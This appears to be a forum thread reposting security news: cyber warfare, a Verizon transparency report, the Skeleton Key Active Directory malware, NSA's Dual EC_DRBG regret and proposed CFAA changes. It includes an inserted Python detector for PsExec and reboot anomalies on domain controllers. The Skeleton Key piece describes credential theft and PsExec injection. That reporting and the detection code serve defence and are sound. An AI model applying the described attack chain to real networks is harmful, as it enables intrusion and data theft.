Numerous malicious attacks on computers and mobile devices as well as networks of important entities have recently made the news and have brought back to the surface the debate on cyber warfare and the dangerousness of cyber weapons. The increasing dependence on the Internet and the recent spur of attacks are beginning to create greater concern. The fear is not just based on the possibility that a cyber attack could simply cause the non-availability of information and services we are now accustomed to. The Internet has not just reshaped the way we obtain news, communicate with others, take care of our finances, watch TV and listen to music, but it is also permeating other essential fields of our lives. From power smart grids to the “Internet of Things,” the potential targets of cyber warriors are now multiple and the possible consequences catastrophic. Premeditated, politically or socially motivated attacks against a computer-dependent society could be orchestrated by foreign powers and affect nations at any level: from the availability of utilities, to denied access to important financial and medical information, to causing a significant impact on national GDPs. This article will explore the concept of cyber warfare and cyber weapons, plus recount latest happenings and discuss whether the danger is real. Cyber Warfare and Cyber Weapons The definition of cyber warfare and cyber weapons is not as clear-cut as it might seem. Distinguishing these attacks from simple cyber crimes is essential to define rules of engagements by countries and to establish what should be considered a direct act of war against the sovereignty and wellbeing of a state. 
According to the Tallinn Manual on the International Law Applicable to Cyber Warfare – a study commissioned by the NATO Cooperative Cyber Defence Centre of Excellence that is not considered a legally binding document – cyber weapons are cyber means of warfare designed, used or intended to cause either injury or death of people or damage to or destruction of objects. Without a globally recognized definition, however, it is hard to strictly define and recognize true acts of cyber warfare, prevent attacks, hold entities accountable and define legal responses. The inability to agree on basic notions is a considerable weakness in the international arena and leaves space for much uncertainty and endless possibilities for nations beginning to employ these warfare techniques. Several definitions have been given by scholars, but, in general, a cyber weapon is intuitively considered any software, virus, and intrusion device that can disrupt critical infrastructures of other countries, from military defense systems to communications to electric power smart grids to financial systems and air traffic control. Debates have been rising on the possibility to consider cyber weapons tools used not only to directly impair systems but also to spy on nations through cyber espionage. Again, the lack of a globally-recognized legal definition doesn’t help. Have cyber weapons ever been deployed? You may recognize an incident that happened in 2009, the first known use of a cyber weapon: Stuxnet. It was a complex piece of malware believed to be an example of a government cyber weapon aimed at severely disrupting the Iranian nuclear program. The paternity of the attack has been a source of debate, but in the end, it was believed to be a joint US/Israel operation. Stuxnet targeted a plant in Natanz, Iran. By turning off valves and impairing centrifuges, equipment was damaged and the Iranian uranium enrichment program effectively slowed down.
However, Stuxnet might have not even been the first cyber war tool directed toward Iran. Flame, another powerful malware that masqueraded itself as a routine Microsoft software update, had already been used to map and monitor Iranian networks and collect critical information. Is a Cyber World War a Concern? A 2013 report by Director of National Intelligence James R. Clapper explained that the possibility of a major cyber attack to US critical infrastructures causing a long-term and widespread disruption of services by major players like Russia and China is remote. However, smaller scale attacks by smaller states or non-state entities seem to be a concern. According to the report, “less advanced but highly motivated actors could access some poorly protected US networks that control core functions, such as power generation, during the next two years, although their ability to leverage that access to cause high-impact, systemic disruptions will probably be limited. At the same time, there is a risk that unsophisticated attacks would have significant outcomes due to unexpected system configurations and mistakes, or that vulnerability at one node might spill over and contaminate other parts of a networked system.” This may not come as a surprise to anyone, but any telecommunications infrastructure attack could cause enough harm to generate fear. Every government or corporation entire infrastructure, let alone the public at large, may be at stake. Can digital attacks really have tangible effects? Absolutely. An oil pipeline in Turkey was cyber attacked and exploded in 2008. The pipeline was super-pressurized and alarms were shut off. By hacking security cameras, attackers (allegedly Russian) were able to hide the blast from the control room that, unaware, was unable to respond promptly. Another attack to a German steel company demonstrated how, by simply infiltrating the information systems running the plant, hackers could cause major damage. 
Although not a single successful Internet attack has been recognized as directed by a foreign terror organization against the United States homeland, there have been instances of intrusions intended to inflict significant harm on the American government or state agencies, as well as US businesses. Last November, there was an intrusion into the networks of the Department of State that led to the unclassified email system shutdown. Carol Morello, the diplomatic correspondent for The Washington Post who covered the affair, noted the activity was related to hacking of White House computers reported a month prior, and to security breaches that occurred at both the U.S. Postal Service and the National Weather Service. Those incidents pointed to Russian hackers as prime suspects; the perpetrators were believed to be working directly for the Russian government. Sony Pictures Entertainment (SPE) is another recent case; its networks were infected in a November 2014 incident. According to the FBI, the occurrence resembled past cyber efforts by North Korea. What makes a cyber warfare attack appealing? Mainly the fact that it can come at little or no cost for the perpetrator. An attacker with great technical capabilities can create disruption by using a single computer wherever he or she is located. While the use of conventional weapons requires expensive manufacturing and physical travel to target locations, cyber attacks can be conducted from anywhere. Traditional weapons have a cost that might be prohibitive for many and are hard to transport (or deliver) in secrecy. In other cases, attacks might require the sacrifice of the offenders. Cyber attacks are quick, can be equally destructive and can definitely be inexpensive to execute. According to Amy Chang, research associate at the Center for a New American Security, “Cyber warfare is a great alternative to conventional weapons. […] It is cheaper for and far more accessible to these small nation-states.
It allows these countries to pull off attacks without as much risk of getting caught and without the repercussions when they are.” Accountability is hard to prove when cyber weapons are used. By using several proxies or infecting computers indirectly, it is difficult to trace back to a particular malicious hacker or organization on any form of attacks. And even if a culprit is found, it is hard to accuse a nation of a deliberate act of war, especially due to lack of a legal framework. The problem today is that we live in a high-tech world of uncertainty where people are not well trained and equipped for these new threats that can disrupt communications, and network traffic to and from websites and can potentially paralyze Internet service providers (ISPs) at the international level across national borders. So, in the face of constant security threats, there is a need for all to fully understand how to handle cyber security issues and cyber war and how to mitigate risks and minimize the damage, as best as possible if the circumstances arise. Cyberspace and its Security What can be done and who should act in defense of a nation’s cyberspace? The answer may be complicated. Defending cyberspace is not an easy feat, considering the number of interconnected computers, mobile devices and networks. The majority of the systems, including those regulating nations’ critical infrastructures, are interconnected and then vulnerable not only to direct attacks but also to infection by transmission. Ironically, the numerous technological advances might also pose a risk, as cyber terrorists seem to be always a step forward in identifying security vulnerabilities before security experts can patch them. Lack of recognized rules in cyberspace and difficulty to implement boundaries complete the picture. Lacking a real global response to cyber warfare, many countries and organizations are creating structures and task forces to prepare against cyber threats. 
According to intelligence studies, more than 140 countries have funded cyber weapon development programs. The U.S. is particularly active and created the USCYBERCOM that “plans, coordinates, integrates, synchronizes, and conducts activities to: direct the operations and defense of specified Department of Defense information networks and; prepare to, and when directed, conduct full-spectrum military cyberspace operations in order to enable actions in all domains, ensure US/Allied freedom of action in cyberspace and deny the same to our adversaries.” In 2012, the U.S. Defense Advanced Research Projects Agency (DARPA) invested $110 million in Plan X, a “Cyberspace is now recognized as a critical domain of operations by the U.S. military and its protection is a national security issue. Plan X is a foundational cyberwarfare program to develop platforms for the Department of Defense to plan for, conduct, and assess cyber warfare in a manner similar to kinetic warfare.” The program was included in DARPA’s reported $1.54 billion cyber budget for 2013-2017. Recently, the U.S. Naval Academy also received $120M to build a classified cyber warfare center in 2016. The center will allow midshipmen to work on classified system and acquire cyber warfare skills. Organizations like the European Advanced Cyber Defence Centre (ACDC), the NATO Computer Incident Response Capability (NCIRC) and the Internet Engineering Task Force (IETF), amongst many others, are working on fighting back against organized, international cyber criminals that have used cyberspace as a warfighting domain. However, this may not be enough to avoid terrorism-based cyberwar attacks, so everyone ought to prepare proactively and effectively by securing systems as much as possible. In an Internet-connected world, every end user is at risk, either directly or indirectly. The Internet provides many different ways to attack. Internet-connected systems must be secured on a global scale. 
With cyberspace being so vast, flexible, and unregulated, all its users are highly vulnerable to dangers from outside threats. Recent cyber attacks highlight the potential threat posed by information warfare tactics and techniques that use computer connectivity and exploit vulnerabilities sometimes caused by users’ inattentiveness or lack of basic cyber security practices. Proper use of intrusion-detection and intrusion-prevention systems (IDS/IPS) and firewalls (a network’s first line of defense against threats) is a basic response. Through real-time analysis of network traffic—i.e., to investigate and contain these security threats—people can detect the majority of the less sophisticated hacking attacks at a user level. Larger companies must be more aware than ever about their network security vulnerabilities and secure their properties with proper Advanced Threat Protection Platforms for endpoint protection and server security. In the case of government-orchestrated cyber attacks, one of the main lines of defense is the creation of a common front against attackers. There is no better time than now to open collaboration and dialogue amongst various industries and government agencies to take action. Attacks against larger, interconnected systems might be more easily disclosed by comparing data and creating common task forces. Detection and prevention alone may not be enough to stop the attackers, each time, but at least it may inhibit future, similar threats. The Internet might be becoming a new weapon for terrorists, so overcoming cyber vulnerability requires multiple different organizations to come forward and stop the launch of cyber threats that can manipulate the physical world while operating without international boundaries. Conclusion Some of the numerous larger-scale cyber attacks can be intuitively considered acts of cyber war. 
With many countries large and small investing in cyber warfare, it is impossible not to think of the use of “information warfare” as a new form of terrorism. Information warfare goes beyond simply attacking computers and communications networks, as a computer-literate terrorist can wreak havoc causing physical destruction and harm to populations. The Internet can be turned into a weapon used against targets by terrorists hidden in cyberspace to carry out cyber violence and disruption, while being physically located elsewhere. Computer-related crimes, as an extension of terrorist attacks, have the potential of bringing catastrophic side effects. Cyberspace is increasingly becoming a place of risk and danger, vulnerable to hacks and cyber warfare. With today’s civilization dependent on interconnected cyber systems to virtually operate many of the critical systems that make our daily lives easier, it is obvious that cyber warfare can be the choice for many governments and states, especially those that don’t have access to expensive, conventional weapons of mass destruction. So, how do we counteract such attacks? If cyber warfare is considered war, then anti-terrorism defenses must be deployed. First, though, a legal basis for responses to attacks must be defined. A legal definition of cyber war and cyber weapon, a definition agreed upon globally, is necessary to define the perimeters within which nations can operate in cyberspace. It is important to define what to consider cyber espionage, cyber war or an act of simple hacking. Lacking a clear definition and a global cyber etiquette, nations are left with creating their own defense against cyber weapons and cyber espionage. Exploring real-world examples, continuously monitoring the Information Superhighway, and endorsing cyber security awareness, web security and online safety are the tools currently available for an effective international governance of the Internet. 
Although the United States has not been subject to real, destructive cyber terrorism as of today, in terms of hostile action or threat, it has identified a number of ways terrorists can use the computer as a tool for hacking or information warfare. As the job of a cyberterrorist has become more difficult to detect, in time, information control may also be critical for successful counter-terrorism and avoidance of infrastructure warfare. Therefore, it is paramount to investigate some common defense mechanisms that can help pinpoint and capture these threats before they affect massive numbers of people and impair activities in a much more pervasive way.

References
Brecht, D. (2014, December). Are Cyber Threats the New Terrorism Frontier? Cyber Warnings E-Magazine, 28-32.
Clapper, J. R. (2013, March 12). US Intelligence Community Worldwide Threat Assessment Statement for the Record. Retrieved from http://www.odni.gov/files/documents/Intelligence%20Reports/2013%20ATA%20SFR%20for%20SSCI%2012%20Mar%202013.pdf
Donohue, B. (2014, December 19). FBI Officially Blames North Korea in Sony Hacks. Threatpost.
Kostadinov, D. (2012, December 21). Cyberterrorism Defined (as distinct from “Cybercrime”). InfoSec Institute.
Morello, C. (2014, November 16). State Department shuts down its e-mail system amid concerns about hacking. The Washington Post.
NATO REVIEW. (n.d.). The history of cyber attacks – a timeline. Retrieved from http://www.nato.int/docu/review/2013/cyber/timeline/EN/index.htm
Paganini, P. (2013, December 6). Cyber warfare – Why we need to define a model of conflict? Retrieved from http://securityaffairs.co/wordpress/20204/intelligence/cyber-warfare-model-of-conflict.html
Storm, D. (2014, December 22). Cyberwarfare: Digital weapons causing physical damage. Retrieved from http://www.computerworld.com/article/2861531/cyberwarfare-digital-weapons-causing-physical-damage.html
Suciu, P. (2014, December 21). Why cyber warfare is so attractive to small nations. Retrieved from http://fortune.com/2014/12/21/why-cyber-warfare-is-so-attractive-to-small-nations/
Source
-
The number of subpoenas, total orders and warrants that the United States government delivered to Verizon all dropped in the second half of 2014, according to the company’s latest transparency report. The giant telecom provider released data on Thursday that showed a decrease in subpoenas of about 10 percent from the first half of last year to the second half. The volume of pen register and trap and trace orders fell by a little less than 10 percent, and the number of warrants served on Verizon by law enforcement also dropped from 14,977 to 13,050. Verizon officials said in the report that the company received between 0-999 National Security Letters during the second half of 2014, the same range it reported for the first half of the year. The government only allows companies to report the number of NSLs they receive in bands of 1,000. The volume of wiretap orders that Verizon receives remained virtually unchanged from 2013 to 2014, falling slightly from 1,496 in all of 2013 to 1,433. In addition to releasing the data on government orders, Verizon officials also said that the company has been working on privacy issues throughout the past year. “While much of our work to protect our customers’ privacy is done behind the scenes, in the past year we took public positions on issues of significance to our customers. We’ve opposed the United States government’s position that it could issue a search warrant to obtain customer emails stored in a Microsoft server in Ireland. We have a particular interest in this issue as we provide cloud computing and data storage services to business customers around the world, including many non-U.S. customers in data centers outside the United States,” said Craig Silliman, executive vice president and general counsel. “Although Verizon has not received any warrants from the U.S. 
government for our customers’ information stored in our overseas data centers, we filed briefs in courts and worked with Senators on a bill (The LEADS Act) to help defeat this overreach by the U.S. government. We also continue to support legislation that will add privacy protections to the Foreign Intelligence Surveillance Act (FISA) statute, including ending bulk collection of communications data.” In terms of secret orders from the Foreign Intelligence Surveillance Court, Verizon said it received between 0-999 FISA orders in the first half of 2014. Those orders targeted between 3,000-3,999 customer selectors, meaning that Verizon definitely received some non-zero number of FISA orders. The government makes companies wait six months before reporting FISA data, so the numbers from the first half of last year are the most recent information Verizon can publish. Source
-
-
Enterprise Active Directory administrators need to be on the lookout for anomalous privileged user activity after the discovery of malware capable of bypassing single-factor authentication on AD that was used as part of a larger cyberespionage campaign against a global company based in London. Hackers already on the company’s network via a remote access Trojan (RAT) deployed what’s being called the Skeleton Key malware used to steal legitimate insider credentials in order to steal company data and exfiltrate it to the outside without raising many red flags. Researchers at Dell SecureWorks would not identify the organization, nor provide any indication on the identity or location of the attackers, other than to say that it was not an “ecrime” operation and some of the documents taken would be of interest to entities on the “Pacific rim.” Skeleton Key purposely lacks persistence, said Dell SecureWorks director of technology Don Smith. It is installed as an in-memory patch on an Active Directory domain controller and will not survive a reboot. Granted, Active Directory domain controllers such as the ones compromised in this attack, are not rebooted all that often. “I don’t think it was a mistake [by the attackers]. The people concerned have the capability of making it persistent,” Smith said. “The lack of persistence characterizes the stealthy nature of this operation. If you make it persistent over a reboot, you have to leave something behind in the registry or elsewhere that will make it restart. This is super stealthy and this minimizes their footprint. They rely on their foothold elsewhere in the network, and jump in every time they need to.” With access to Active Directory, the hackers can secure username-password combinations and use those credentials to remotely carry out the rest of their attack authenticated as legitimate users. 
In the case of the London firm, they were discovered on the network which used password-only authentication for its webmail and VPN remote access. Once inside, they were able to use credentials stolen from critical servers, admin workstations and domain controllers to drop Skeleton Key anywhere else on the network. Dell SecureWorks posted a number of indicators of compromise and YARA detection signatures in a report published this week. A number of file names were also found associated with Skeleton Key, including one suggesting an older variant of the malware exists, one that was compiled in 2012. Dell SecureWorks also said the attackers, once on the network, upload the malware’s DLL file to an already compromised machine and attempt to access admin shares on the domain controllers using a list of stolen admin credentials. If the credentials don’t work, they deploy password-stealing tools to extract admin passwords from memory of another server, the domain admin’s workstation or the targeted domain controllers, Dell SecureWorks said. With access to the controller, Skeleton Key’s DLL is loaded and the attackers use the PsExec utility to remotely inject the Skeleton Key patch and run the malware’s DLL remotely on the target domain controllers. The attackers then use a NTLM password hash to authenticate as any user. The lack of persistence isn’t the only perceived weakness associated with Skeleton Key. Its deployment caused AD domain controller replication issues in regional offices that required a reboot. The frequent reboots were an indication that the attackers were re-implanting Skeleton Key, Smith said, which along with the presence of PsExec or TaskScheduler are other anomalous privileged user activities to be on the lookout for. “This was from about just collecting passwords. Once they injected the hash, they could then walk up to any machine in the network, give any user name and their password and get in,” Smith said. 
“The bad guys used remote access to authenticate at will. I think that characterizes this attack as a long-running cyberespionage operation. There is a lot of information in the victim organization they’re looking for, and they want to maintain as low a profile as possible to evade discovery. All the espionage activity is carried out as an ordinary user. The challenge as a defender is the need to look for anomalous user behavior, which isn’t all that simple a task.” Source
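The article above names the signals a defender can actually look for: PsExec used against domain controllers, re-implanting after reboots, scheduled tasks, and unusually frequent DC restarts. The following is an added example, not Dell SecureWorks' report, YARA rules or code: a small detector that runs those checks over constructed Windows events forwarded as JSON lines. Host names, the log format and the reboot threshold are assumptions; the event IDs are the real Windows ones.

```python
"""
Added example, not Dell SecureWorks' report, signatures or code: a detector
for the anomalous privileged-user activity the article says to watch on
domain controllers (PsExec service installs, scheduled-task creation and
unusually frequent reboots). Host names, the log format and the thresholds
are constructed assumptions.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Windows events forwarded as JSON lines. The event IDs are
# the real Windows ones: 7045 = service installed (System log), 4698 = scheduled
# task created (Security log), 1074 = shutdown/restart initiated by a user/process.
SAMPLE_EVENTS = r"""
{"ts":"2015-01-10T02:11:04","host":"DC01","event_id":7045,"user":"CORP\\svc_backup","data":{"ServiceName":"PSEXESVC","ImagePath":"%SystemRoot%\\PSEXESVC.exe"}}
{"ts":"2015-01-10T02:12:30","host":"DC01","event_id":1074,"user":"CORP\\svc_backup","data":{"Reason":"Other (Planned)"}}
{"ts":"2015-01-11T09:40:12","host":"WS17","event_id":7045,"user":"CORP\\jsmith","data":{"ServiceName":"PSEXESVC","ImagePath":"%SystemRoot%\\PSEXESVC.exe"}}
{"ts":"2015-01-12T01:05:44","host":"DC01","event_id":4698,"user":"CORP\\svc_backup","data":{"TaskName":"\\Updater"}}
{"ts":"2015-01-14T03:00:00","host":"DC01","event_id":1074,"user":"CORP\\svc_backup","data":{"Reason":"Other (Planned)"}}
{"ts":"2015-01-20T22:15:00","host":"DC02","event_id":1074,"user":"CORP\\adm_patch","data":{"Reason":"Operating System: Upgrade (Planned)"}}
{"ts":"2015-01-21T10:00:00","host":"DC02","event_id":7045,"user":"SYSTEM","data":{"ServiceName":"Spooler","ImagePath":"%SystemRoot%\\System32\\spoolsv.exe"}}
"""

DOMAIN_CONTROLLERS = {"DC01", "DC02"}   # constructed: the hosts in scope
REBOOT_WINDOW = timedelta(days=7)       # DCs are "not rebooted all that often"
REBOOT_THRESHOLD = 2                    # two restarts per window is unusual here


def parse_events(text):
    """Parse JSON-lines events; timestamps become datetime objects."""
    events = []
    for line in text.strip().splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        ev["ts"] = datetime.fromisoformat(ev["ts"])
        events.append(ev)
    return events


def is_psexec_service(data):
    """PsExec installs its helper service as PSEXESVC by default; a renamed
    service usually still carries the binary name in its image path."""
    name = data.get("ServiceName", "").upper()
    path = data.get("ImagePath", "").upper()
    return name.startswith("PSEXESVC") or "PSEXE" in path


def _alert(ev, kind, detail):
    return {"ts": ev["ts"].isoformat(), "host": ev["host"],
            "user": ev["user"], "kind": kind, "detail": detail}


def detect(events, dcs=DOMAIN_CONTROLLERS):
    """Return alerts for DC-only privileged activity worth an analyst's look."""
    alerts = []
    reboots = defaultdict(list)
    reboot_flagged = set()
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["host"] not in dcs:
            continue                          # workstation noise is out of scope here
        eid, data = ev["event_id"], ev.get("data", {})
        if eid == 7045 and is_psexec_service(data):
            alerts.append(_alert(ev, "psexec_service_install", data.get("ServiceName")))
        elif eid == 4698:
            alerts.append(_alert(ev, "scheduled_task_created", data.get("TaskName")))
        elif eid == 1074:
            reboots[ev["host"]].append(ev["ts"])
            recent = [t for t in reboots[ev["host"]] if ev["ts"] - t <= REBOOT_WINDOW]
            if len(recent) >= REBOOT_THRESHOLD and ev["host"] not in reboot_flagged:
                reboot_flagged.add(ev["host"])      # alert once per host
                alerts.append(_alert(ev, "frequent_dc_reboots",
                                     f"{len(recent)} in {REBOOT_WINDOW.days}d"))
    return alerts


def accounts_touching_multiple_signals(alerts):
    """Privileged accounts behind more than one alert type: the article's
    pattern (PsExec, re-implanting, reboots) tends to come from one stolen
    admin identity, so the overlap is the thing to escalate first."""
    kinds = defaultdict(set)
    for a in alerts:
        kinds[a["user"]].add(a["kind"])
    return {u: sorted(k) for u, k in kinds.items() if len(k) > 1}


if __name__ == "__main__":
    found = detect(parse_events(SAMPLE_EVENTS))
    for a in found:
        print(a)
    print(accounts_touching_multiple_signals(found))
```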
-
In a new article in an academic math journal, the NSA’s director of research says that the agency’s decision not to withdraw its support of the Dual EC_DRBG random number generator after security researchers found weaknesses in it and questioned its provenance was a “regrettable” choice. Michael Wertheimer, the director of research at the National Security Agency, wrote in a short piece in Notices, a publication of the American Mathematical Society, that even during the standards development process for Dual EC many years ago, members of the working group focused on the algorithm raised concerns that it could have a backdoor in it. The algorithm was developed in part by the NSA and cryptographers were suspicious of it from the beginning. Then, in 2007, well into the life of Dual EC, researchers at Microsoft delivered a talk at a conference that detailed the potential for a backdoor in the algorithm. Still, both the NSA and NIST, which approves technical standards for the United States government, stood by the algorithm. Dual EC was mostly forgotten until late 2013 when allegations emerged that the NSA may have had a secret $10 million contract with RSA Security that prompted the vendor to make Dual EC–which was then known to be weak–the default random number generator in some of its key crypto products. NIST last year removed Dual EC from its guidance on random number generators. “I wrote about it in 2007 and said it was suspect. I didn’t like it back then because it was from the government,” crypto pioneer Bruce Schneier told Threatpost in September 2013. “It was designed so that it could contain a backdoor. Back then I was suspicious, now I’m terrified.” The NSA came under heated criticism for the Dual EC episode, and now one of the agency’s top officials has said it was a mistake for the NSA not to have withdrawn its support for the algorithm after the weaknesses were raised years ago.
“With hindsight, NSA should have ceased supporting the dual EC_DRBG algorithm immediately after security researchers discovered the potential for a trapdoor. In truth, I can think of no better way to describe our failure to drop support for the Dual_EC_DRBG algorithm as anything other than regrettable,” Wertheimer wrote in a piece in Notices’ February issue. “The costs to the Defense Department to deploy a new algorithm were not an adequate reason to sustain our support for a questionable algorithm. Indeed, we support NIST’s April 2014 decision to remove the algorithm. Furthermore, we realize that our advocacy for the DUAL_EC_DRBG casts suspicion on the broader body of work NSA has done to promote secure standards. Indeed, some colleagues have extrapolated this single action to allege that NSA has a broader agenda to ‘undermine Internet encryption.’” Wertheimer said that the agency is trying to combat that perception by changing the way that it contributes to standards efforts in order to be more transparent and accountable. “One significant, and correct, change is that all NSA comments will be in writing and published for review. In other words, we will be open and transparent about our cryptographic contributions to standards. In addition, we will publish algorithms before they are considered for standardization to allow more time for public scrutiny,” Wertheimer wrote. “With these measures in place, even those not disposed to trust NSA’s motives can determine for themselves the appropriateness of our submissions, and we will continue to advocate for better security in open-source software, such as Security Enhancements for Linux and Security Enhancements for Android.” Source
-
I propose that users who abuse the dislike button be sanctioned! They keep messing around and give a dislike to every post, or else remove the dislike function! Or stop showing Likes / Dislikes when you post something.
-
@Nytro After I gave your post a like!
-
The Obama administration, currently engaged in a war of words with North Korea over the recent hacking of Sony Pictures Entertainment, is calling on Congress to increase prison sentences for hackers and to expand the definition of hacking. During next week's State of the Union address, the president is set to publicly urge increased prison time and other changes to the Computer Fraud and Abuse Act—the statute that was used to prosecute Internet activist Aaron Swartz before he committed suicide in 2013. At issue is the Computer Fraud and Abuse Act (CFAA), passed in 1984 to bolster the government's ability to nab hackers who destroy or disrupt computer functionality or who steal information. In general, the CFAA makes it illegal to "knowingly and with intent to defraud, accesses a protected computer without authorization, or exceeds authorized access, and by means of such conduct furthers the intended fraud and obtains anything of value, unless the object of the fraud and the thing obtained consists only of the use of the computer and the value of such use is not more than $5,000 in any 1-year period." Obama said Tuesday, "We want cybercriminals to feel the full force of American justice, because they are doing as much damage—if not more, these days—as folks who are involved in more conventional crime." Among other things, penalties under Obama's plan would increase from a maximum five-year penalty to 10 years for pure hacking acts, like circumventing a technological barrier. What's more, the law would expand the definition of what "exceeds authorized access" means. A hacker would exceed authorization when accessing information "for a purpose that the accesser knows is not authorized by the computer owner." That raised the eyebrows of researchers and scholars alike. That language is "awkward," according to Orin Kerr, a professor and CFAA expert who has defended Lori Drew and Andrew "weev" Auernheimer in CFAA criminal prosecutions. 
"For example, if your employer has a policy that 'company computers can be accessed only for work-related purposes,' and you access the computer for personal reasons, then you presumably would be accessing the computer for a purpose that you know the employer has not allowed," Kerr said Wednesday. Kerr continued: Kerr said his "biggest concern" surrounds accepted social computing practices, or as he calls it—"norms-based" liability. He said: More broadly, Kerr added, "The expansion of 'exceeding authorized access' would seem to allow lots of prosecutions under a 'you knew the computer owner wouldn't like that' theory. And that strikes me as a dangerous idea, as it focuses on the subjective wishes of the computer owner instead of the individual’s actual conduct." Security expert Robert Graham said Wednesday that the proposal would affect "cybersecurity professionals that protect the Internet. If you cared about things such as 'national security' and 'cyberterrorism,' then this should be your biggest fear. Because of our knowledge, we do innocent things that look to outsiders like 'hacking.' Protecting computers often means attacking them. The more you crack down on hackers, the more of a chilling effect you create in our profession. This creates an open door for nation-state hackers and the real cybercriminals." Source
-